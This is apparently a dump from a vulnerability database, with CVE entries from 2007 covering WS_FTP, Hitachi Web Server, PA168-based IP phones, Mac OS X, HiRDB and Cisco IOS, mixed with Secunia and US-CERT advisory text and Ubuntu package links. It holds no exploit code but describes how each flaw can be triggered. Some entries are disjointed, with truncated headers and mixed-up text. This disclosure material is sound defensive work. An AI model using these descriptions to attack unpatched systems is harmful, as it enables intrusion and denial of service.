http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.2.1-5ubuntu0.1_sparc.deb
Size/MD5: 325494 95813d719f39a3b86f6b44cda4519a83
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.2.0-0ubuntu3.1_sparc.deb
Size/MD5: 304582 8bca3c95b9e5f10d08357fb32ffa690c
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.2.0-0ubuntu3.1_sparc.deb
Size/MD5: 321526 1765ba83a127b01ed81632785688a0b0
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.2.0-0ubuntu3.1_sparc.deb
Size/MD5: 234114 fd5c8e1b70051aeae6d189037043c23e
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.1.1-0ubuntu12.2_sparc.deb
Size/MD5: 50314 9fdc77ad9a5448d3b92c3b05fcfc4ac1
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.1.1-0ubuntu12.2_sparc.deb
Size/MD5: 733754 8d5052a6cb973b478b57efcf9535020b
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.1.1-0ubuntu12.2_sparc.deb
Size/MD5: 1344340 10ad7e4b138b14102ab3a396fa31255f
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xserver-xephyr_1.1.1-0ubuntu12.2_sparc.deb
Size/MD5: 1500142 801229631c468c808bc3570a02f36436
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.1.1-0ubuntu12.2_sparc.deb
Size/MD5: 3695516 c037048a7c2971f1c064e1644083a738
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.1.1-0ubuntu12.2_sparc.deb
Size/MD5: 297856 45e8359cdae581b6ab4d5ad683a4ba89
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.1.1-0ubuntu12.2_sparc.deb
Size/MD5: 1477724 8d6c6d871e63e6009ab6f9be3b10300f
| VAR-200702-0070 | CVE-2007-0665 | Ipswitch WS_FTP 2007 Professional SCP module format string vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Format string vulnerability in the SCP module in Ipswitch WS_FTP 2007 Professional might allow remote attackers to execute arbitrary commands via format string specifiers in the filename, related to the SHELL WS_FTP script command. WS_FTP is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
A successful attack may allow the attacker to crash the application or possibly to execute arbitrary code. This may facilitate unauthorized access or privilege escalation in the context of the user running the application. WS_FTP is a standard FTP client tool under the Winsock protocol. A remote attacker may exploit this vulnerability to control the user's machine by tricking the user into opening a malicious file.
| VAR-200701-0392 | CVE-2007-0514 | Multiple Vulnerabilities Concerning Hitachi Web Server |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in multiple Hitachi Web Server, uCosminexus, and Cosminexus products before 20070124 allow remote attackers to inject arbitrary web script or HTML via (1) HTTP Expect headers or (2) image maps. Hitachi Web Server has the vulnerabilities listed below: 1. A vulnerability that allows rollback of the OpenSSL version when using SSL. 2. 3. A cross-site scripting vulnerability due to inadequate processing of the Expect header. 1. When using SSL, an attacker could deceptively alter the protocol, forcing the use of SSL version 2. 2. and 3. An attacker could insert malicious script. ** Deleted ** This entry was removed because its contents were found to duplicate CVE-2005-2969, CVE-2005-3352, and CVE-2006-3918 (Hitachi vendor information HS06-022). Please refer to CVE-2005-2969, CVE-2005-3352, and CVE-2006-3918.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user or to bypass certain security restrictions. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
1) Input passed to certain parameters in various files in Hitachi Web
Server is not properly sanitised before being returned to the user.
2) Input passed via the "Expect" header in Hitachi Web Server is not
properly sanitised before being returned to the user.
3) An error in the way Hitachi Web Server handles SSL 3.0 or TLS 1.0
protocols can be exploited by attackers to replace the connection
with a connection using SSL 2.0 protocol.
See the vendor advisory for a matrix of affected versions.
SOLUTION:
Updates are available for some versions (please see vendor's advisory
for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.hitachi-support.com/security_e/vuls_e/HS06-022_e/01-e.html
| VAR-200701-0286 | CVE-2007-0528 | Centrality Communications A168 chipset admin web console vulnerability allowing important information (passwords and configuration data) to be obtained |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The admin web console implemented by the Centrality Communications (aka Aredfox) PA168 chipset and firmware 1.54 and earlier, as provided by various IP phones, does not require passwords or authentication tokens when using HTTP, which allows remote attackers to connect to existing superuser sessions and obtain sensitive information (passwords and configuration data). Pa168 Chipset is prone to an information disclosure vulnerability.
TITLE:
SOYO G668 Ethernet IP Phone Session Management Vulnerability
SECUNIA ADVISORY ID:
SA23936
VERIFY ADVISORY:
http://secunia.com/advisories/23936/
CRITICAL:
Less critical
IMPACT:
Security Bypass
WHERE:
From remote
OPERATING SYSTEM:
SOYO G668 IP Phone 1.x
http://secunia.com/product/13354/
DESCRIPTION:
Adrian Pastor has reported a vulnerability in SOYO G668 Ethernet IP
Phone, which can be exploited by malicious people to bypass certain
security restrictions.
The vulnerability is caused due to an error within the session
management. If a superuser logs into the web management console, the
web service accepts any request as long as the superuser's session is
valid. This can be exploited to bypass the authentication process and
e.g. allows the modification of certain settings.
The vulnerability is reported in firmware version 1.42. Other
versions may also be affected.
SOLUTION:
Only log into the web management console from trusted network
environments. Use a firewall to restrict access to the phone.
PROVIDED AND/OR DISCOVERED BY:
Adrian Pastor
ORIGINAL ADVISORY:
http://milw0rm.com/exploits/3189
| VAR-200701-0397 | CVE-2007-0464 | Apple Mac OS X CoreText uninitialized pointer vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The _CFNetConnectionWillEnqueueRequests function in CFNetwork 129.19 on Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to cause a denial of service (application crash) via a crafted HTTP 301 response, which results in a NULL pointer dereference. Apple CFNetwork Framework is prone to a denial-of-service vulnerability.
Attackers may exploit this issue by issuing a maliciously designed HTTP response to a client application that uses the vulnerable CFNetwork API.
Successful exploits will result in denial-of-service conditions within client applications.
CFNetwork 129.19 on Mac OS X 10.4.8 is vulnerable to this issue. Remote attackers may use this vulnerability to cause the client to crash. CFNetwork is a Core Services framework that provides the function libraries needed to decompress network protocols. This vulnerability can be triggered if the server sends a specially crafted response to a client using this API, resulting in a denial of service condition.
TITLE:
Apple Mac OS X Security Update Fixes Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA27643
VERIFY ADVISORY:
http://secunia.com/advisories/27643/
CRITICAL:
Highly critical
IMPACT:
Security Bypass, Cross Site Scripting, Spoofing, Exposure of
sensitive information, Privilege escalation, DoS, System access
WHERE:
From remote
OPERATING SYSTEM:
Apple Macintosh OS X
http://secunia.com/product/96/
DESCRIPTION:
Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.
1) Multiple errors within the Adobe Flash Player plug-in can be
exploited by malicious people to gain knowledge of sensitive
information or compromise a user's system.
For more information:
SA26027
2) A null-pointer dereference error exists within AppleRAID when
handling disk images. This can be exploited to cause a system
shutdown when a specially crafted disk image is mounted e.g.
automatically via Safari if the option "Open 'safe' files after
downloading" is enabled.
3) An error in BIND can be exploited by malicious people to poison
the DNS cache.
For more information:
SA26152
4) An error in bzip2 can be exploited to cause a DoS (Denial of
Service).
For more information:
SA15447
This also fixes a race condition when setting file permissions.
5) An unspecified error in the implementation of FTP of CFNetwork can
be exploited by a malicious FTP server to cause the client to connect
to other hosts by sending specially crafted replies to FTP PASV
(passive) commands.
6) An unspecified error exists in the validation of certificates
within CFNetwork. This can be exploited via a Man-in-the-Middle
(MitM) attack to spoof a web site with a trusted certificate.
7) A null pointer dereference error in the CFNetwork framework can
lead to an unexpected application termination when a vulnerable
application connects to a malicious server.
8) A boundary error in CoreFoundation can be exploited to cause a
one-byte buffer overflow when a user is enticed to read a specially
crafted directory hierarchy.
Successful exploitation allows execution of arbitrary code.
9) An error exists in CoreText due to the use of an uninitialised
pointer and can be exploited to execute arbitrary code when a user is
tricked into reading a specially crafted text.
10) Some vulnerabilities in Kerberos can be exploited by malicious
users and malicious people to compromise a vulnerable system.
For more information:
SA26676
11) An error in the handling of the current Mach thread port or
thread exception port in the Kernel can be exploited by a malicious,
local user to execute arbitrary code with root privileges.
Successful exploitation requires permission to execute a setuid
binary.
12) An unspecified error in the Kernel can be exploited to bypass
the chroot mechanism by changing the working directory using a
relative path.
13) An integer overflow error in the "i386_set_ldt" system call can
be exploited by malicious, local users to execute arbitrary code with
escalated privileges.
14) An error exists in the handling of standard file descriptors
while executing setuid and setgid programs. This can be exploited by
malicious, local users to gain system privileges by executing setuid
programs with the standard file descriptors in an unexpected state.
15) An integer overflow exists in the Kernel when handling ioctl
requests. This can be exploited to execute arbitrary code with system
privileges by sending a specially crafted ioctl request.
16) The default configuration of tftpd allows clients to access any
path on the system.
17) An error in the Node Information Query mechanism may allow a
remote user to query for all addresses of a host, including
link-local addresses.
18) An integer overflow exists in the handling of ASP messages with
AppleTalk. This can be exploited by malicious, local users to cause a
heap-based buffer overflow and to execute arbitrary code with system
privileges by sending a maliciously crafted ASP message on an
AppleTalk socket.
19) A double-free error in the handling of certain IPV6 packets can
potentially be exploited to execute arbitrary code with system
privileges.
20) A boundary error exists when adding a new AppleTalk zone. This
can be exploited to cause a stack-based buffer overflow by sending a
maliciously crafted ioctl request to an AppleTalk socket and allows
execution of arbitrary code with system privileges.
21) An arithmetic error exists in AppleTalk when handling memory
allocations. This can be exploited by malicious, local users to cause
a heap-based buffer overflow and execute arbitrary code with system
privileges by sending a maliciously crafted AppleTalk message.
22) A double free error in NFS exists when processing an AUTH_UNIX
RPC call. This can be exploited by malicious people to execute
arbitrary code by sending a maliciously crafted AUTH_UNIX RPC call
via TCP or UDP.
23) An unspecified case-sensitivity error exists in NSURL when
determining if a URL references the local file system.
24) A format string error in Safari can be exploited by malicious
people to execute arbitrary code when a user is tricked into opening
a .download file with a specially crafted name.
25) An implementation error exists in the tabbed browsing feature of
Safari. If HTTP authentication is used by a site being loaded in a
tab other than the active tab, an authentication sheet may be
displayed although the tab and its corresponding page are not
visible.
26) A person with physical access to a system may be able to bypass
the screen saver authentication dialog by sending keystrokes to a
process running behind the screen saver authentication dialog.
27) Safari does not block "file://" URLs when loading resources. This
can be exploited to view the content of local files by enticing a user
to visit a specially crafted web page.
28) An input validation error exists in WebCore when handling HTML
forms. This can be exploited to alter the values of form fields by
enticing a user to upload a specially crafted file.
29) A race condition error exists in Safari when handling page
transitions. This can be exploited to obtain information entered in
forms on other web sites by enticing a user to visit a malicious web
page.
30) An unspecified error exists in the handling of the browser's
history. This can be exploited to execute arbitrary code by enticing
a user to visit a specially crafted web page.
31) An error in Safari allows malicious websites to set Javascript
window properties of websites served from a different domain. This
can be exploited to get or set the window status and location of
pages served from other websites by enticing a user to visit a
specially crafted web page.
32) An error in Safari allows a malicious website to bypass the same
origin policy by hosting embedded objects with javascript URLs. This
can be exploited to execute arbitrary HTML and script code in context
of another site by enticing a user to visit a specially crafted web
page.
33) An error in Safari allows content served over HTTP to alter or
access content served over HTTPS in the same domain. This can be
exploited to execute Javascript code in context of HTTPS web pages in
that domain when a user visits a malicious web page.
34) An error in Safari in the handling of new browser windows can be
exploited to disclose the URL of an unrelated page.
For more information see vulnerability #2 in:
SA23893
35) An error in WebKit may allow unauthorised applications to access
private keys added to the keychain by Safari.
36) An unspecified error in Safari may allow a malicious website to
send remotely specified data to arbitrary TCP ports.
37) WebKit/Safari creates temporary files insecurely when previewing
a PDF file, which may allow a local user to access the file's
content.
5) The vendor credits Dr Bob Lopez PhD.
6) The vendor credits Marko Karppinen, Petteri Kamppuri, and Nikita
Zhuk of MK&C.
9) Will Dormann, CERT/CC
11) An anonymous person, reported via iDefense Labs.
12) The vendor credits Johan Henselmans and Jesper Skov.
13) The vendor credits RISE Security.
14) The vendor credits Ilja van Sprundel.
15) The vendor credits Tobias Klein, www.trapkit.de
16) The vendor credits James P. Javery, Stratus Data Systems
17) The vendor credits Arnaud Ebalard, EADS Innovation Works.
18, 21) Sean Larsson, iDefense Labs
19) The vendor credits Bhavesh Davda of VMware and Brian "chort"
Keefer of Tumbleweed Communications.
20) An anonymous person, reported via iDefense Labs.
22) The vendor credits Alan Newson of NGSSoftware, and Renaud
Deraison of Tenable Network Security, Inc.
25) The vendor credits Michael Roitzsch, Technical University
Dresden.
26) The vendor credits Faisal N. Jawdat
27) The vendor credits lixlpixel.
28) The vendor credits Bodo Ruskamp, Itchigo Communications GmbH.
29) The vendor credits Ryan Grisso, NetSuite.
30) The vendor credits David Bloom.
31, 32) The vendor credits Michal Zalewski, Google Inc.
33) The vendor credits Keigo Yamazaki of LAC Co.
36) The vendor credits Kostas G. Anagnostakis, Institute for Infocomm
Research and Spiros Antonatos, FORTH-ICS
37) The vendor credits Jean-Luc Giraud, and Moritz Borgmann of ETH
Zurich.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=307041
US-CERT VU#498105:
http://www.kb.cert.org/vuls/id/498105
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=630
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=629
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=627
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=628
OTHER REFERENCES:
SA15447:
http://secunia.com/advisories/15447/
SA23893:
http://secunia.com/advisories/23893/
SA26027:
http://secunia.com/advisories/26027/
SA26152:
http://secunia.com/advisories/26152/
SA26676:
http://secunia.com/advisories/26676/
I. Further
details are available in the related vulnerability notes.
II. Impact
The impacts of these vulnerabilities vary. Potential consequences
include remote execution of arbitrary code or commands, bypass of
security restrictions, and denial of service.
III. This and
other updates are available via Apple Update or via Apple Downloads.
IV. Please send
email to <cert@cert.org> with "TA07-319A Feedback VU#498105" in the
subject.
Produced 2007 by US-CERT, a government organization.
Revision History
November 15, 2007: Initial release
| VAR-200701-0391 | CVE-2007-0513 | Hitachi HiRDB Datareplicator Service disruption (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Hitachi HiRDB Datareplicator 7HiRDB, 7(64), 6, 6(64), 5.0, and 5.0(64); and various products that bundle HiRDB Datareplicator; allows attackers to cause a denial of service (CPU consumption) via certain data. Hitachi HiRDB Datareplicator is prone to a remote denial-of-service vulnerability.
TITLE:
Hitachi HiRDB DataReplicator Denial of Service Vulnerability
SECUNIA ADVISORY ID:
SA23816
VERIFY ADVISORY:
http://secunia.com/advisories/23816/
CRITICAL:
Less critical
IMPACT:
DoS
WHERE:
From local network
SOFTWARE:
Hitachi HiRDB DataReplicator 5.x
http://secunia.com/product/13320/
http://secunia.com/product//
Hitachi HiRDB DataReplicator 6.x
http://secunia.com/product/13318/
http://secunia.com/product//
Hitachi HiRDB DataReplicator 7.x
http://secunia.com/product/13316/
http://secunia.com/product//
DESCRIPTION:
A vulnerability has been reported in Hitachi HiRDB DataReplicator,
which can be exploited by malicious people to cause a DoS (Denial of
Service).
See the vendor advisory for a matrix of affected versions.
SOLUTION:
Updates are available for some versions (see the vendor's advisory
for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.hitachi-support.com/security_e/vuls_e/HS06-023_e/01-e.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
| VAR-200701-0443 | CVE-2007-0479 | Cisco IOS fails to properly process specially crafted IPv6 packets |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in the TCP listener in Cisco IOS 9.x, 10.x, 11.x, and 12.x allows remote attackers to cause a denial of service by sending crafted TCP traffic to an IPv4 address on the IOS device. Cisco IOS fails to properly process IPv6 packets with specially crafted routing headers. Successful exploitation of this vulnerability may allow an attacker to execute code, or create a denial-of-service condition. The Cisco IOS Transmission Control Protocol listener contains a memory leak. Cisco IOS is prone to a denial-of-service vulnerability.
This issue affects only devices running the Internet Protocol version 4 (IPv4).
Attackers can exploit this issue to cause memory leaks, potentially causing memory exhaustion over time. This will result in denial-of-service conditions.
This issue affects all Cisco routers using Cisco IOS Software versions 9 through 12.4.
This issue is tracked as Cisco Bug ID CSCek37177. Note that an attacker can trigger this vulnerability without completing the TCP three-way handshake, so TCP packets with forged source addresses can also be used in the attack.
National Cyber Alert System
Technical Cyber Security Alert TA07-024A
Cisco IOS is Affected by Multiple Vulnerabilities
Original release date: January 24, 2007
Last revised: --
Source: US-CERT
Systems Affected
* Cisco network devices running IOS in various configurations
Overview
Several vulnerabilities have been discovered in Cisco's Internet
Operating System (IOS).
I.
II. Impact
Although the resulting impacts of these three vulnerabilities are
slightly different, in the case of VU#341288 and VU#274760, a
remote attacker could cause an affected device to reload the
operating system. In some cases, this creates a secondary
denial-of-service condition because packets are not forwarded
through the affected device while it is reloading.
Because devices running IOS may transmit traffic for a number of
other networks, the secondary impacts of a denial of service may be
severe.
III. Please refer to the "Software Versions and Fixes"
sections of the Cisco Security Advisories listed in the References
section of this document for more information on upgrading.
Workaround
Cisco has also published practical workarounds for these
vulnerabilities. Please refer to the "Workarounds" section of each
Cisco Security Advisory listed in the References section of this
document for more information.
Sites that are unable to install an upgraded version of IOS are
encouraged to implement these workarounds.
IV. References
* US-CERT Vulnerability Note VU#217912 -
<http://www.kb.cert.org/vuls/id/217912>
* US-CERT Vulnerability Note VU#341288 -
<http://www.kb.cert.org/vuls/id/341288>
* US-CERT Vulnerability Note VU#274760 -
<http://www.kb.cert.org/vuls/id/274760>
* Cisco Security Advisory: Crafted TCP Packet Can Cause Denial of
Service -
<http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml>
* Cisco Security Advisory: Crafted IP Option Vulnerability -
<http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml>
* Cisco Security Advisory: Cisco Security Advisory: IPv6 Routing
Header Vulnerability -
<http://www.cisco.com/warp/public/707/cisco-sa-20070124-IOS-IPv6.shtml>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-024A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-024A Feedback VU#217912" in the
subject.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
January 24, 2007: Initial release
1) An error exists in the processing of IP options in various IP
packets (including some ICMP requests, PIMv2, PGM, and URD requests).
SOLUTION:
Update to the latest version (please see the vendor's advisory for
details).
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) Reported by the vendor.
3) Arnaud Ebalard, EADS Corporate Research Center.
ORIGINAL ADVISORY:
Cisco Systems:
http://www.cisco.com/warp/public/707/cisco-sa-20070124-bundle.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20070124-IOS-IPv6.shtml
----------------------------------------------------------------------